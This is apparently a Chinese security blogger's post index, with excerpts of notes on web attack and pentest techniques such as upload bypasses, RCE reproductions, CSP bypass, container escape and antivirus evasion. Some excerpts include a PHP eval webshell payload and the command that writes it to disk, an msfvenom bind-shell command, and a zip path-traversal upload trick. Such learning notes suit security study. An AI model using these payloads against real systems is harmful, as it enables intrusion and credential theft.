- 博客(88)
- 收藏
- 关注
原创 web攻防日常小知识点积累(持续更新……)
本篇博客主要是记录自己在日常的学习中碰到的一些以前不清楚的小知识点以及在看文章的过程中碰到的一些好的思路,记录下来复习的时候用。1.登录界面鉴别是否可以爆破:利用burpsuite抓包后进行repeater测试,多次repeater对比后获得的网站的响应仅有时间不同,则可以爆破。2.当没有思路的时候不妨F12看看源码。3.get传参报错的时候再试试curl来post传参...
2020-12-03 20:00:22 247
原创 文件上传的小姿势——绕过doc成功上传马
常规的文件上传现在基本上已经没了,解析漏洞也没了,实战中碰到一个绕过doc的小技巧:本来没有上传点,只有一个doc文档上传点:首先关注后缀是否可控,大小写绕过,%00绕过均没有成功响应 直接乱输一个后缀名,发现依然没有回应;正常的doc是能够返回路径的,访问url直接下载文件在上面图片的中template找到了突破口 我发现更改template (模板)的值后,文件的回显目录发生了变化 猜测该系统是根据文件类型来定义上传保存目录; doc是默认保存在静态目录下的 于是将改成asp后缀,在对应
2022-02-22 23:04:12 389
原创 Windows栈溢出学习笔记
Windows下栈溢出:1.高级语言编译链接后变成PE文件,PE装载运行后变成进程。2.系统栈: 操作系统为进程中的每个函数调用都划分了一个栈帧空间,(系统自动分配)系统栈是这些函数调用栈帧的集合; 系统栈由系统自动维护: 1)随着函数调用层数的增加,函数栈帧是一块块地向内存低地址方向延伸的,当前正在运行的函数的栈帧总是在栈顶; 2)随着进程中函数调用层数的减少,即各函数调用的返回,栈...
2022-02-22 11:45:00 1038 1
原创 一些奇奇怪怪的信息收集姿势——杀毒、JS、endpoint
最近实战过程中学到了一些信息收集相关的姿势,一起分享学习下1.寻找子域名寻找子域名你还在爆破吗?要不要尝试一些杀毒?直接:VirusTotal 利用该网站查看病毒检查报告来收集子域名:省时间,不用跑字典2.从url或子域的列表中获取js文件GitHub - lc/subjs: Fetches javascript file from a list of URLS or subdomains.(subjs)他就会提取js连接然后结合linkfinder——GitHub -.
2022-02-21 23:27:27 4322
原创 xss加载但没反应——CSP简介与绕过
如果xss加载了但是没反应,可能是有CSP—内容安全策略——可以抓包看看有没有Content-Security-Policy内容安全策略(CSP),其核心思想十分简单:网站通过发送一个 CSP 头部,明确告诉客户端(制定比较严格的策略和规则),来告诉浏览器什么是被授权执行的与什么是需要被禁止的。即使攻击者发现漏洞,但是它是没办法注入脚本的其被誉为专门为解决XSS攻击而生的神器。 简单来说,就是我们能够规定,我们的网站只接受我们指定的请求资源。使用 CSP 配置内容安全策略涉及到添加 Co...
2022-02-08 22:53:49 3025
原创 命令执行无路径写shell
在实战中我们可能挖到了一个命令执行但是因为找不到目录而无法写shell,那么该如何来拿shell呢 简单来说就是:查找系统的某个文件并在那个文件的同级目录下写入我们的新文件0x02 命令[规定查找的盘符] 例如: c盘, d盘, e盘, f盘[查找的文件] 例如:index.php[写入的内容] 例如:<?php eval($_REQUEST[1]); ?>[写入的文件名字]例如:xx.php命令:for /f %i in ('dir /s /b [规定查找的...
2021-12-05 16:50:54 3397
原创 bypass上传文件大小限制
在内网中,有时偶尔会因为种种限制,拿到shell后无法上传大文件,以至于只能上传小文件。 比如在拿下目标 shell 后发现只能上传几百 K 的小文件,文件稍微大些比如几 M 的文件就会提示上传失败。这时候就需要想办法将大文件变成小文件后再进行上传,具体的解决办法分为两种方式,一种是常规的压缩文件一种是分割文件 压缩文件就很简单,利用压缩软件将所需要的文件进行压缩有上传,但是有一个问题,有的文件压缩的时候大小变化并不明显,这时候可以考虑利用分块压缩,如可上传600KB大小的文件,可以以500...
2021-07-03 10:32:38 162
原创 文件上传bypass—压缩包内容检测
登录到后台后getshell可以考虑在模板上传处上传,将webshell打包到压缩包上传,模板上传处常用压缩包上传后自动解压,但是有些waf可能会针对模板目录进行扫描,对上传解压缩后的文件进行检测,在此分享两个思路1.可尝试建立目录进行压缩2.可以使用目录穿越../的方法向上一级目录进行上传将php文件直接压缩为zip,然后用notepad++打开压缩文件如下将phpinfo改为../info,如下图...
2021-06-28 13:48:50 376 2
原创 绕过组策略禁用命令提示符
拿到webshell以后发现无法执行命令,抛开RCE限制不说,提示命令提示符已经被管理员禁用,换句话来书cmd.exe被禁用了 为什么会出现这种情况
2021-06-17 14:49:40 431 1
原创 破解内网火狐所保存的邮箱账号和密码
进内网中,发现了个人单机装的有 foxmail 客户端,然后在 forxmail 安装目录下还发现存在数据目录,碰巧此人还可能用火狐登陆过邮箱,啧啧啧,那么本地就可能保存的有邮箱账号密码,这个文章就是我们怎么碰巧...
2021-06-14 23:05:12 1358
原创 ThinkPHP5RCE漏洞复现
又到了闲来无事的漏洞复现时间~~~ThinkPHP RCE漏洞是由于变量覆盖而引起的,漏洞源于可以对thinkphp/library/think/Request.php文件中的method方法可以进行变量覆盖,通过覆盖类的核心属性filter导致RCE,其攻击点较为多,有些还具有限制条件,另外该漏洞在利用上会出现一些问题。漏洞影响范围:<= 5.0.23、<= 5.1.32。...
2021-06-10 17:00:53 885 2
原创 过宝塔的disable_functions
宝塔默认限制了以下危险函数,这里我们可以尝试使用以下3个项目来绕过,由于putenv()函数没有被限制,所以最终可以通过LD_PRELOAD & putenv()绕过disable_functions执行系统命令。 https://github.com/mm0r1/exploits/ https://github.com/l3m0n/Bypass_Disable_functions_Shell https://github.com/yangyangwithgnu/bypas
2021-06-09 22:16:20 671
原创 HTTP参数污染(HPP)漏洞
听说HPP漏洞可以过上传白名单? HPP是HTTP Parameter Pollution的缩写,意为HTTP参数污染。 原理:浏览器在跟服务器进行交互的过程中,浏览器往往会在GET/POST请求里面带上参数,这些参数会以 名称-值 对的形势出现,通常在一个请求中,同样名称的参数只会出现一次。但是在HTTP协议中是允许同样名称的参数出现多次的。比如下面这个链接:http://www.baidu.com?name=aa&name=bb ,针对同样名称的参数出现多次的情况,不同的服务器的...
2021-06-08 11:40:01 491
原创 JWT攻击实战
事情是这样的,这个 token 让我觉得很突兀,通常 token 要么用作身份凭证、要么用于防 CSRF,若是前者,就不应该与同样表示身份凭证的 cookie 同时存在,若是后者,通常为 16 位或 32 位的哈希值,而非用点号分隔的三段 base64。于是,我依次将每段解码:...
2021-06-07 22:53:40 851
原创 靶机知识点之ftp匿名登陆
因为想做红队 所以我打算靶机方面都要做到最后一步权限维,促进学习; 很久没有玩vulnhub靶机了,过来打一打;先探测一下靶机的ip:思路——21端口ftp暴力破解 22端口远程登陆 80端口寻找功能点主页为一张图片 信息收集一下感觉是拿用户名和密码然后ssh登陆提权找flag,但是似乎目前并没有搜集到什么有用的信息但是ftp这里我还没有做什么工作 查了一下 发现他允许匿名登陆 去搜了一下相关的知识点(利用nmap -A -v参数即可得到目标具体信息)...
2021-05-06 21:59:14 352
原创 CVE-2020-6418复现
影响版本Chrome< 80.0.3987.122漏洞复现测试的Chrome版本为80.0.3987.87部署恶意html页面在web服务器,访问恶意html页面触发弹出Chrome内置打印机html<html lang="en"><head><meta charset="UTF-8"><title>test</title><script type="text...
2021-04-17 16:25:09 680
原创 Apache Solr <= 8.8.1任意文件读取漏洞复现
0x01 简介ApacheSolr是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口。用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引;也可以通过Http Get操作提出查找请求,并得到XML格式的返回结果。0x02 漏洞概述Apache Solr 存在任意文件读取漏洞,攻击者可以在未授权的情况下获取目标服务器敏感文件。0x03 影响版本Apache Solr <= 8.8.10x04 环境搭建使用vulhub.
2021-04-09 18:46:36 306
原创 phpMyAdmin 4.8.1 远程文件包含漏洞复现
0x01 漏洞简介phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。在phpMyAdmin 4.8.2 之前的 4.8.x 版本中,其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞。影响范围phpMyAdmin 4.8.0 phpMyAdmin 4.8.10x02 漏洞环境使用vulnhub快速搭建靶场bashcd /vulhub/phpmyadmin/CVE-2018-12613sudo docker-comp
2021-04-04 15:46:37 922
原创 Docker逃逸--runC容器逃逸漏洞(CVE-2019-5736)
漏洞简述:攻击者可以通过特定的容器镜像或者exec操作可以获取到宿主机的runC执行时的文件句柄并修改掉runc的二进制文件,从而获取到宿主机的root执行权限。利用条件:Docker版本 < 18.09.2,runC版本< 1.0-rc6。(在Docker 18.09.2之前的版本中使用了的runc版本小于1.0-rc6。)可通过 docker 和docker-runc 查看当前版本情况。漏洞测试复现:1、漏洞环境准备:curl https://g...
2021-04-02 22:12:22 554 1
原创 手写代码之python实现自动化收集信息
这里我简单和大家分享一下我的编写过程,具体代码我会放到我的GitHub博客中,由于只是简单脚本,没有采用多线程,主要是为了去理解一些工具的原理采取编写的脚本,锻炼自己的代码能力该脚本为输入域名后自动进行:识别目标是否存在CDN、利用socket协议来扫描端口(我默认扫描1-6635端口,比较慢,如果需要的话可以git下来自定义端口) whois查询 子域名查询(这里需要自己提供子域名字典)CDN的判断是调用nslookup来进行 如果存在CDN 那么就不会仅仅返回一条ip端口扫描是利用so...
2021-03-28 21:12:15 430
原创 通过ctfhub实操学习ssrf
实战中碰到的SSRF漏洞比较少,刚好在freebuf上看到了一位大佬写的ssrf系统性学习文章(https://www.freebuf.com/articles/web/258365.html)就跟着一起学习一下。SSRF,服务端请求伪造;一般情况下,SSRF攻击的目标是外网无法连接的内部系统,比如说当我们发现一个web服务器存在ssrf时,而它又连接内网,我们就可以利用这个服务器对内网发出一些请求来获取一些敏感信息,而此时的web服务器就被当作成为跳板使用; SSRF形成的原因是由于服务端提.
2021-03-21 23:22:32 601
原创 CTFHUB-RCE通关记录以及常见的绕过过滤的方法
先过关,再分析相关的防御源代码1.过滤cat然后cat 301472130920273.php然后查看网页源代码即可得到flag2.过滤cat根据题目要求过滤了cat 而该服务器为Linux系统区分大小写 就无法通过大小写来绕过 本来想使用vi命令替换cat命令也能查看到flag中的内容 但是失败了 最后用了替换法:127.0.0.0 ; $a=ca;$b=t; $a$b flagxxxx题目源码:<?php$res = FALSE;if (is.
2021-03-21 18:43:05 2081
原创 ctfhub-信息泄露
1.目录遍历点开之后一个一个找就行,实战中可能会碰到.bak备份文件2.phpinfophpinfo还是能够看到很多敏感信息的直接CTRL+f寻找flag即可3.备份文件下载 网站源码:根据提示利用burpsuite爆破组合拼接,最后www.zip为备份文件输入后自动下载 bak文件:根据提示,flag在index.php的源码中,找到备份文件查看index.php源码即可VIM缓存:v...
2021-03-21 15:03:11 194
原创 mimikatz bypass360全家桶
环境配置:mimikatz源码下载:https://github.com/gentilkiwi/mimikatz设置vitual studio为c++在工具中安装xp的相关组件改为x64将mimikatz属性中警告视为错误设置为否在编辑中打开查找和替换将所有的mimikatz替换为test将文件名称中的mimkatz也全部替换成test接下来修改ico文件:把ico文件替换成为36-的ico文件重新点击生成即可.
2021-03-20 15:58:26 443
原创 Apache-Solr 任意文件读取漏洞复现
2021.3.18新出的,无CVE编号Apache Solr是一个开源的搜索服务,使用Java语言开发,主要基于HTTP和Apache Lucene实现的。它是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口。用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引;也可以通过Http Get操作提出查找请求,并得到XML格式的返回结果一、漏洞描述 Apache Solr 存在任意文件读取漏洞,攻击者可以在未授权的情况下获取目标服务器敏感文.
2021-03-20 12:45:03 639
原创 Metasploit 通过隐藏 Bind Shell,只允许指定目标接收反弹 Shell
在内网渗透中,正向 bind shell 会经常用到,正反向shell:反向 reverse shell 就是通过我们监听,目标肉鸡运行 exe 我们就会收到一个反弹 shell;而正向就是目标肉鸡运行 exe,我们去连接肉鸡。首先通过 MSF 生成一个正向 shell:msfvenom -p windows/shell_hidden_bind_tcp LPORT=8889 AHOST=192.168.84.128 -f exe > bind_shell.exe使用pytho.
2021-03-19 20:53:11 329
原创 手写代码之登陆session验证(从越权中想到的一个demo需求)
demo需求:登陆成功后赋值session然后访问index.php页面在index.php判断用户是否登陆并实时检测数据库种已存在的账号密码是否与登陆的账号密码一致如果不一致则禁止访问如何注册前面我已经写过相关的文章,注意数据库要自己配置好login.html:login.php:index.php:...
2021-03-18 20:34:57 87
原创 记一次简单的未授权访问漏洞的挖掘
http://note.youdao.com/noteshare?id=cc4d47e5a38ac0e3a03f31fffebcbc08&sub=EB3306A92ACB4541ABFC1BA1C9AC1A04
2021-03-17 23:12:28 904
原创 webshell开启3389及绕过限制
有道云笔记链接:http://note.youdao.com/noteshare?id=4a73501377a7ec39b65f0a4eeacbb0bd&sub=0EB22496F17E477D83919C4302168C04
2021-03-14 23:10:16 209 3
原创 Joomla目录遍历导致RCE漏洞复现(CVE-2021-23132)
我漏洞复现小王子又回来啦~有道云笔记链接::http://note.youdao.com/noteshare?id=399c71dbffbd2d59dc60d015f4a08839&sub=13C13D53B28D4F81AC366215FAC1101C
2021-03-14 21:43:04 1334
原创 利用ssh日志getshell
有道云链接:http://note.youdao.com/noteshare?id=c0fae546a2dbe355d28e26d74452dfea&sub=F6D01018FA10494AA1592CFBFE6D34E2
2021-02-27 17:24:10 258
原创 BurpSuite插件 Struts2-RCE使用
有道云笔记链接:http://note.youdao.com/noteshare?id=a080e661d6c199818ff90052185dbd39&sub=B8AFFBFA240147B3963094075DFFC4BF
2021-02-15 14:18:09 340
原创 JS敏感信息泄露漏洞与JSFinder的使用
有道云笔记链接:http://note.youdao.com/noteshare?id=142eaa4a58675b9ccdb5d798756c3329&sub=8C2DF1DD1A3E45D19739E7FE958DF5E1
2021-02-13 21:38:22 592
原创 sql注入之mysql权限问题
有道云笔记链接:http://note.youdao.com/noteshare?id=0e4d59cda87bd2e8d2a864b1aa0e3210&sub=A8D1F4C0629B4A5ABAF405920ADD10E4
2021-02-13 14:08:35 385
原创 由xss编码绕过而学习的实体编码、js编码适用环境
有道云笔记链接:http://note.youdao.com/noteshare?id=3d4163c2923836cdb32d3303059b20d1&sub=C900F6E6D0EC40489225B5E4EDEE7A8C
2021-02-12 21:48:04 121
原创 shiro反序列化漏洞复现与自动化检测工具
有道云笔记链接:http://note.youdao.com/noteshare?id=7e7d4d5b63954b7aab97a685e8538f1d&sub=0E19E7B7E6864D77ABDAB719139DC46D
2021-02-07 23:27:28 930
原创 thinkphp漏洞复现之ThinkPHP5 5.0.22 5.1.29 RCE、ThinkPHP5 5.0.23 RCE
ThinkPHP5 5.0.22 5.1.29 RCE:http://note.youdao.com/noteshare?id=c8f01a93856f614a19aa906b98c73e82&sub=C7F1CA77B84C481CB0747B92FC4C997EThinkPHP5 5.0.23 RCE:http://note.youdao.com/noteshare?id=fcdcfcfd9ea03205cbf5f4af3039a2d8&sub=8C55F64E39D7.
2021-02-07 17:45:29 491
原创 S2-RCE漏洞复现之S2-008、S2-009、S2-012
S2-008 RCE:http://note.youdao.com/noteshare?id=34c9b26ad2b1aa68ea2d90c470494f5c&sub=787243D32DCE4BA8B18C4E4F726D5CACS2-009 RCE:http://note.youdao.com/noteshare?id=80738a6edbac5ce7d91ea12bd71ea01c&sub=00E06768A8984D3FB63FFA8879767429S2-012 R
2021-02-07 14:57:34 222
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人